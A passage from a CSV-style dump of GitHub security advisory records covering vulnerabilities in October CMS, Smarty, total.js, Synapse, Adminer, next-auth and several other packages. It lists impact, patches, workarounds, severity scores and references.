'https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210108-0007/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-18T20:41:26Z', 'nvd_published_at': '2020-12-03T17:15:00Z'}" +1.4.0,GHSA-7ggw-h8pp-r95r,2023-09-07T17:47:26Z,2021-02-10T02:32:35Z,,['CVE-2021-3311'],October CMS Session ID not invalidated after logout,"### Impact +When logging out, the session ID was not invalidated. This is not a problem while the user is logged out, but as soon as the user logs back in the old session ID would be valid again; which means that anyone that gained access to the old session cookie would be able to act as the logged in user. This is not a major concern for the majority of cases, since it requires a malicious party gaining access to the session cookie in the first place, but nevertheless has been fixed. + +### Patches +Issue has been patched in Build 472 (v1.0.472) and v1.1.2. + +### Workarounds +Apply https://github.com/octobercms/library/commit/642f597489e6f644d4bd9a0c267e864cabead024 to your installation manually if unable to upgrade to Build 472 or v1.1.2. + +### References +- Reported by Anisio (Brazilian Information Security Analyst) +- http://cve.circl.lu/cve/CVE-2021-3311 + +### For more information +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) + +### Threat assessment: +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/rain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.472'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/rain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-7ggw-h8pp-r95r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3311'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/642f597489e6f644d4bd9a0c267e864cabead024'}, {'type': 'WEB', 'url': 'https://anisiosantos.me/october-cms-token-reactivation'}, {'type': 'WEB', 'url': 'https://octobercms.com/forum/chan/announcements'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/october/rain'}, {'type': 'WEB', 'url': 'http://cve.circl.lu/cve/CVE-2021-3311'}]","{'cwe_ids': ['CWE-613'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T02:30:45Z', 'nvd_published_at': '2021-02-05T14:15:00Z'}" +1.4.0,GHSA-26hg-crh6-mjrw,2021-02-23T21:28:28Z,2021-02-23T21:28:28Z,2021-02-23T21:28:28Z,[],Directory Traversal,"Affected versions of list-n-stream package (0.0.10 and before), are vulnerable to a directory traversal issue.",[],"[{'package': {'ecosystem': 'npm', 'name': 'list-n-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/KoryNunn/list-n-stream/commit/99b0b40b34aaedfcdf25da46bef0a06b9c47fb59#diff-78c12f5adc1848d13b1c6f07055d996e'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T20:01:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-c497-v8pv-ch6x,2023-08-08T19:28:27Z,2021-02-01T15:01:14Z,,['CVE-2021-23329'],Prototype pollution in nested-object-assign,The package nested-object-assign before 1.0.4 is vulnerable to Prototype Pollution via the default function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nested-object-assign'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23329'}, {'type': 'WEB', 'url': 'https://github.com/Geta/NestedObjectAssign/pull/11'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NESTEDOBJECTASSIGN-1065977'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/nested-object-assign'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-01T06:29:54Z', 'nvd_published_at': '2021-01-31T16:15:00Z'}" +1.4.0,GHSA-jvg4-9rc2-wvcr,2021-02-10T02:17:07Z,2021-02-10T02:32:07Z,,[],Generation of fake documents via public GET-call,"### Impact +Generation of fake documents via public GET-call + +### Patches +We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-jvg4-9rc2-wvcr'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/shopware/platform'}]","{'cwe_ids': ['CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T02:17:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-rhm9-p9w5-fwm7,2023-08-30T22:06:59Z,2021-02-10T01:32:27Z,,['CVE-2020-36242'],PyCA Cryptography symmetrically encrypting large values can lead to integer overflow,"cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. When certain sequences of `update()` calls with large values (multiple GBs) for symetric encryption or decryption occur, it's possible for an integer overflow to happen, leading to mishandling of buffers. This is patched in version 3.3.2 and newer. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-rhm9-p9w5-fwm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36242'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/issues/5615'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/82b6ce28389f0a317bc55ba2091a74b346db7cae'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/blob/master/CHANGELOG.rst'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/compare/3.3.1...3.3.2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L7RGQLK4J5ZQFRLKCHVVG6BKZTUQMG7E/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-190', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T01:31:02Z', 'nvd_published_at': '2021-02-07T20:15:00Z'}" +1.4.0,GHSA-xm8r-5wh6-f46f,2021-02-24T19:45:15Z,2021-02-24T19:45:15Z,2021-02-24T19:45:15Z,[],Timing attack,"While each ID is used for only one authentication attempt, a timing attack is possible to figure out in Autobahn.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'autobahn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/crossbario/autobahn-python/issues/157'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2013-0019'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T14:32:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-94ww-22rx-493x,2021-02-24T19:46:35Z,2021-02-24T19:46:35Z,2021-02-24T19:46:35Z,[],Cross-Site Scripting,"Flower, before 0.9.2, has a XSS on tasks page because data is not properly escaped.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'flower'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mher/flower/issues/650'}, {'type': 'WEB', 'url': 'https://github.com/mher/flower/commit/0f2eab324f65823340a0146f7a2b44804e4725ee'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:52:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-f6gj-7592-5jxm,2021-02-23T21:33:53Z,2021-02-23T21:33:53Z,2021-02-23T21:33:53Z,[],Directory Traversal,"Affected versions of node-simple-router package (0.10.0 and before), are vulnerable to a directory traversal issue.",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-simple-router'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sandy98/node-simple-router/commit/dfdd52e2e80607af433097d940b3834fd96df488#diff-b9cfc7f2cdf78a7f4b91a753d10865a2'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T20:20:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-f4hq-453j-p95f,2022-05-26T20:40:57Z,2021-02-05T20:43:34Z,,['CVE-2021-3189'],Open redirect in Slashify,"The package is an Express middleware that normalises routes by stripping any final slash, redirecting, for example, `bookings/latest/` to `bookings/latest`. However, it does not validate the path it redirects to in any way. In particular, if the path starts with two slashes (or two backslashes, or a slash and a backslash, etc.) it may redirect to a different domain. + +Consider the [example from the docs](https://www.npmjs.com/package/slashify#usage). Assume we have run it and started a server on `localhost:3000`, then visiting `localhost:3000///github.com/` redirects you to https://github.com. + +## Recommendation + +This vulnerability is currently un-patched in the `slashify` package so there is no known safe version of this package. Discontinuing use of `slashify` is recommended.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'slashify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3189'}, {'type': 'WEB', 'url': 'https://github.com/divshot/slashify'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210401-0004/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-199-open-redirect-slashify'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/slashify'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-05T20:42:47Z', 'nvd_published_at': '2021-02-19T23:15:00Z'}" +1.4.0,GHSA-pg53-56cg-4m8q,2021-02-22T20:43:03Z,2021-02-11T21:36:24Z,,['CVE-2021-21310'],Token verification bug in next-auth,"### Impact + +Implementations using the **Prisma database adapter** with the **Email provider** **are impacted**. + +Implementations using the Prisma database adapter that are not using the Email provider are not impacted. +Implementations using the default database adapter (TypeORM) with the Email provider are not impacted. +Implementations not using a database are not impacted. + +### Patches + +This issue is fixed in 3.3.0 and newer versions. + +### Workarounds + +Those not able to upgrade can alternatively disable the Email provider as a workaround. + +### Description + +The Prisma database adapter was checking the verification token but not the identifier (the email address associated with the token). This made it possible to use a valid token assigned to one user, to sign in as another user when using the Prima adapter in conjunction with the Email provider. The defect is specific to the community-supported Prisma database adapter in versions <3.3.0 and is not present in the default database adapter (TypeORM). + +*Note: The current community-supported adapter was not developed by Prisma.* + +The defect was a problem in the implementation of verification function the adapter and is not directly related to Prisma. + +The flaw may exist in other third party database adapters that do not check both the identifier and token values. + +The design of the database adapter API may be revised in future to help reduce the likelyhood of similar defects. + +### Timeline + +On Monday (2021-02-08) we were notified via responsible disclosure by Alessandro Angelino (@AlessandroA) of a flaw in the implementation of the Prisma database adapter included with NextAuth.js. A detailed write up and proof of concept were provided. + +The following day (2021-02-09) we published a fix in v3.3.0 and confirmed through internal testing, and with Alessandro, that the issue was resolved in the new release and prompted users to upgrade. + +On 2021-02-10 we received a CVE ID and published this advisory within a few hours of notification. + +We would like to thank Alessandro for using responsible disclose to allow us to address the issue promptly and publish this advisory once an update was available that resolved the issue and Balázs Orbán (@balazsorban44) for facilitating a timely release of the fix.",[],"[{'package': {'ecosystem': 'npm', 'name': 'next-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/security/advisories/GHSA-pg53-56cg-4m8q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21310'}, {'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/releases/tag/v3.3.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/next-auth'}]","{'cwe_ids': ['CWE-290'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-11T21:36:12Z', 'nvd_published_at': '2021-02-11T22:15:00Z'}" +1.4.0,GHSA-3rpf-5rqv-689q,2022-05-03T03:01:58Z,2021-02-26T19:53:24Z,,['CVE-2021-26120'],PHP Code Injection by malicious function name in smarty,"Template authors could inject php code by choosing a malicous {function} name. Sites that cannot fully trust template authors should update as soon as possible. Please upgrade to 3.1.39 or higher. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'smarty/smarty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.39'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/security/advisories/GHSA-3rpf-5rqv-689q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26120'}, {'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/commit/165f1bd4d2eec328cfeaca517a725b46001de838'}, {'type': 'PACKAGE', 'url': 'https://github.com/smarty-php/smarty'}, {'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md#3139---2021-02-17'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00014.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202105-06'}, {'type': 'WEB', 'url': 'https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5151'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T19:52:58Z', 'nvd_published_at': '2021-02-22T02:15:00Z'}" +1.4.0,GHSA-4449-hg37-77v8,2021-07-28T18:57:23Z,2021-02-05T20:43:27Z,,['CVE-2020-28494'],Command injection in total.js,There is a command injection vulnerability that affects the package total.js before version 3.4.7. The issue occurs in the image.pipe and image.stream functions. The type parameter is used to build the command that is then executed using child_process.spawn. The issue occurs because child_process.spawn is called with the option shell set to true and because the type parameter is not properly sanitized.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28494'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/6192491ab2631e7c1d317c221f18ea613e2c18a5'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTALJS-1046672'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/total.js'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-03T07:49:15Z', 'nvd_published_at': '2021-02-02T11:15:00Z'}" +1.4.0,GHSA-v936-j8gp-9q3p,2021-08-31T21:06:25Z,2021-02-26T17:28:34Z,,['CVE-2021-21273'],Open redirects on some federation and push requests,"### Impact +Requests to user provided domains were not restricted to external IP addresses when calculating the key validity for third-party invite events and sending push notifications. This could cause Synapse to make requests to internal infrastructure. The type of request was not controlled by the user, although limited modification of request bodies was possible. + +For the most thorough protection server administrators should remove the deprecated `federation_ip_range_blacklist` from their settings after upgrading to Synapse v1.25.0 which will result in Synapse using the improved default IP address restrictions. See the new `ip_range_blacklist` and `ip_range_whitelist` settings if more specific control is necessary. + +### Patches +Issue is resolved by #8821. Further improvements to protect homeservers by default were made in #8870 and #8954. + +### Workarounds +Requests to internal IP addresses could be blocked at the system or network level.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.25.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-v936-j8gp-9q3p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21273'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/8821'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/30fba6210834a4ecd91badf0c8f3eb278b72e746'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.25.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T17:26:48Z', 'nvd_published_at': '2021-02-26T18:15:00Z'}" +1.4.0,GHSA-x5r2-hj5c-8jx6,2021-06-24T19:56:17Z,2021-02-11T20:42:59Z,,['CVE-2021-21311'],SSRF in adminer,"### Impact +Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. + +### Patches +Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9). + +### Workarounds +* Use a single driver version (e.g. `adminer-mysql.php`). +* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/). + +### References +https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf + +### For more information +If you have any questions or comments about this advisory: +* Comment at ccd2374b.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'vrana/adminer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21311'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/vrana/adminer'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released/'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-11T20:42:04Z', 'nvd_published_at': '2021-02-11T21:15:00Z'}" +1.4.0,GHSA-f92j-qf46-p6vm,2021-02-02T15:34:21Z,2021-02-02T15:46:52Z,,['CVE-2021-21028'],Reflected Cross-site Scripting in ACS Commons,"### Impact + +ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. + +An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful. + +### Patches + +This issue has been resolved in v4.10.0 + +### Workarounds + +No workaround exist. + +### References + +N/A + +### For more information + +If you have any questions or comments about this advisory open an issue in acs-aem-commons. + +### Credit + +This issue was discovered and reported by Christopher Whipp (Christopher.Whipp@servicesaustralia.gov.au).",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.adobe.acs:acs-aem-commons'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/security/advisories/GHSA-f92j-qf46-p6vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21028'}, {'type': 'WEB', 'url': 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/commit/14d769c86606c4ce9a93c47a19f87e1ad72788d6'}, {'type': 'WEB', 'url': 'https://helpx.adobe.com/security/products/acrobat/apsb21-09.html'}]","{'cwe_ids': ['CWE-416', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T15:34:21Z', 'nvd_published_at': '2021-02-11T20:15:00Z'}" +1.4.0,GHSA-j95h-wmx9-4279,2021-02-25T17:15:39Z,2021-02-25T17:15:39Z,2021-02-25T17:15:39Z,[],Denial of Service," +**Withdrawn:** Duplicate of GHSA-j95h-wmx9-4279. + +Affected 